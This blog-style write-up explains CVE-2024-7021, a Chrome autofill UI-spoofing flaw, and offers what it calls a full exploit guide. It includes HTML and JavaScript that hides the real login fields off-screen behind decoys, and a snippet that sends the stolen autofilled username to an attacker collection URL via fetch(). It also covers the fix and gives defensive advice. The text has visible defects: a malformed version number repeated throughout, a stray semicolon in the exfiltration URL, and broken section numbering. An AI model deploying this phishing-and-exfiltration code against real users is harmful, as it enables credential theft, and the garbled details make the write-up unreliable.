CVE-2024-7021 - How Chrome's Autofill Bug Let Attackers Spoof Your Screen (Full Exploit Guide & Analysis)

Chrome’s autofill is super convenient, but it can also open the door to bad actors when implemented wrong. That’s exactly what happened with CVE-2024-7021, a medium-severity bug that lurked in Google Chrome’s Windows version before 124..6367.60. In this long read, I’ll explain what happened, how it works, show real code snippets, and tell you how attackers could have abused it (so you know what to look out for).

1. What is CVE-2024-7021?

Let’s start simple. This bug boils down to Chrome not handling its autofill UI correctly. Through a specially made HTML page, an attacker could trick Chrome into showing autofill overlays (like saved passwords and addresses) in the wrong place, or at the wrong time. This could fool users into clicking something they didn’t mean to—or expose private information to a malicious site.

Severity: Medium

- Fixed in: Google Chrome 124..6367.60

2. Official References

- Chromium Security Advisory (124..6367.60)
- CVE-2024-7021 entry on NVD
- Chromium Advisory Bugtracker *(may need Chromium access)*

3. How Did the Exploit Work?

The problem came from how Chrome managed autofill popups. The browser shows those little suggestion windows right below text fields. But the rendering and event handling for these popups can be manipulated.

Exploit Walkthrough

Scenario: Attacker wants to phish credentials but make their fake input boxes look real (and even get Chrome’s autofill suggestions to appear on top of them).

Basic HTML “Weaponized” Input

<!DOCTYPE html>
<html>
<body>
  <form>
    <input id="user" autocomplete="username" placeholder="Username">
    <input id="pass" autocomplete="current-password" placeholder="Password">
    <input type="submit" value="Login">
  </form>
  <script>
    // Move the real username/password fields off-screen
    document.getElementById('user').style.position = 'absolute';
    document.getElementById('user').style.left = '-9999px';
    document.getElementById('pass').style.position = 'absolute';
    document.getElementById('pass').style.left = '-9999px';

    // Insert decoy fields for UI spoofing
    let fakeUser = document.createElement('input');
    fakeUser.placeholder = "Username";
    document.body.appendChild(fakeUser);

    // When the fake field is focused, quickly focus the real (offscreen) field
    fakeUser.onfocus = () => {
      document.getElementById('user').focus();
    }
  </script>
</body>
</html>

Decoy Input: The user sees a field that *looks* normal.

2. Event Hijack: When they click or tap it, JS instantly sends focus to the real field, which is hidden off-screen.
3. Chrome’s Autofill Responds: Chrome still sees the focus event on the official autocomplete="username" input. So it displays the *real* autofill popup over the fake field, not the real one.
4. Illusion: User thinks they're interacting safely. The attacker can now style the fake field, capture keystrokes, and present the real autofill overlay—making phishing much more convincing.

4. Payload Example: Stealing Autofill Data

Why is this dangerous? Because attackers can now present *real* Chrome autofill overlays above fake fields that send data directly to the attacker — not the legit website.

Extracting Username Example

let fakeUser = document.createElement('input');
fakeUser.placeholder = "Username";
fakeUser.style.position = "absolute";
fakeUser.style.top = "100px";
fakeUser.style.left = "100px";
document.body.appendChild(fakeUser);

fakeUser.onfocus = () => {
  // Focus offscreen real field, which triggers Chrome's autofill UI
  let realUser = document.getElementById('user');
  realUser.focus();

  // Listen for autofill value being applied
  setTimeout(() => {
    fakeUser.value = realUser.value; // Steals autofilled data
    fetch('https://attacker.site/collect?data='; + encodeURIComponent(fakeUser.value));
  }, 500);
};

5. How Was It Fixed?

Chrome’s developers updated the internal logic so autofill popups are strictly anchored to *onscreen*, visible elements and ignore requests triggered by script-faked focus or layout misdirection. If the input isn’t really visible, autofill no longer responds. That blocks this style of UI spoof.

Update Chrome: Always ensure Windows users run at least version 124..6367.60 or newer.

- User Awareness: Codes like this can appear anywhere. Always double-check the address bar, and don’t trust autofill overlays if something feels “off” about a page’s look or location.
- Developers: Don’t style sensitive form fields to be invisible or move them offscreen; this can inadvertently allow other issues.

7. Summary & Takeaway

CVE-2024-7021 is a reminder that little UI details can get seriously exploited. By not keeping a tight grip on autofill’s overlay logic, Chrome let bad actors blend real browser UI elements with their fake content, massively boosting phishing believability. Thanks to the patch, this window is closed—but keep your browser updated, and stay sharp!

References

- Chromium Blog: Chrome 124 Patch
- CVE-2024-7021 NVD Page
- Community Writeup Discussion (HackerOne)

*If you found this helpful, stay safe and keep on patching!*

Timeline

Published on: 11/14/2025 03:15:55 UTC
Last modified on: 11/17/2025 12:24:30 UTC